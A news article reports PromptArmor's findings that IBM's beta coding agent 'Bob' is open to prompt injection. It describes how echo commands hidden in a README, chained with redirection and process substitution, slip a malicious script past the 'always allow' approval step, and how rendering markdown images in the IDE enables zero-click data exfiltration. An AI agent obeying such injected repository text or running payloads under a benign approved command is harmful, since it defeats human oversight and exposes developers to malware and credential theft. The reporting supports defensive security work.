Researchers Find IBM’s AI Coding Agent Vulnerable To Prompt Injection Attacks

Security researchers testing a new generation of AI coding agents say that small design choices how commands are approved, how markdown is rendered, how safeguards are enforced can quietly open paths to malware execution and data exfiltration, even in tools built with human oversight in mind.

Contents

A Coding Assistant Under Scrutiny How Benign Commands Turn Malicious Data Exfiltration Without a Click Warnings, Defenses, and Open Questions

A Coding Assistant Under Scrutiny

When IBM introduced “Bob,” its AI-powered coding agent, the company described it as a development partner that understands a programmer’s intent, repositories, and security standards. Announced last October and still in closed beta, Bob is offered in two forms: a command-line interface and an integrated development environment resembling popular AI-assisted editors.

Before general release, security researchers at PromptArmor began evaluating Bob’s defenses. Their findings, shared with The Register, suggest that the system can be manipulated into executing malware through prompt injection attacks, and that its IDE component is vulnerable to common AI-driven data exfiltration techniques.

The researchers emphasize that the issues do not stem from a single catastrophic flaw, but from how Bob interprets and approves sequences of commands when interacting with untrusted content, such as open-source repositories or developer documentation.

How Benign Commands Turn Malicious

One attack scenario described by PromptArmor centers on the use of the shell’s echo command a normally harmless instruction that prints text to standard output. In the researchers’ test case, a markdown file contained a series of echo commands embedded in a README.

The first two commands behaved exactly as expected, triggering Bob to prompt the user for approval. Once approved, Bob offered the option to “always allow” the command in future runs. The third instance, however, used echo as a wrapper to fetch a malicious script.

If a user had previously approved echo to always run, the malicious payload could be downloaded and executed without further consent. Researchers also found that Bob’s agent software failed to detect when multiple subcommands were chained together using the shell’s > redirection operator, allowing entire instruction sets to run under the guise of a single approved command.

In practice, PromptArmor said, this could enable attackers to run ransomware, steal credentials, or take control of a developer’s machine all while appearing to comply with Bob’s allow-list rules.

Data Exfiltration Without a Click

Beyond command execution, researchers identified what they described as a zero-click data exfiltration risk affecting Bob’s IDE. According to PromptArmor, the IDE renders markdown images in model output using a Content Security Policy that permits outbound network requests.

That behavior can allow attackers to log network endpoints and potentially extract data through pre-fetched JSON schemas, without requiring any direct user interaction. Such vectors, the researchers noted, are increasingly common in AI applications that ingest and render untrusted content.

Bob’s own safeguards block some well-known shell techniques, such as command substitution using $(command). But PromptArmor found that the system did not account for process substitution — a gap they traced to a bug in minified JavaScript code underlying the agent’s logic.

Warnings, Defenses, and Open Questions

IBM’s documentation acknowledges that AI agents operating with tool access carry inherent risks. The company advises users to rely on explicit allow lists, avoid wildcard characters, and assume that the agent will prompt for approval when potentially dangerous commands arise.

PromptArmor argues that, in Bob’s current form, those assumptions do not always hold. In an email to The Register, the firm’s managing director, Shankar Krishnan, said that the “human in the loop” approval process can end up validating only a surface-level safe command, while more sensitive instructions run underneath.

📲 Join Our WhatsApp Channel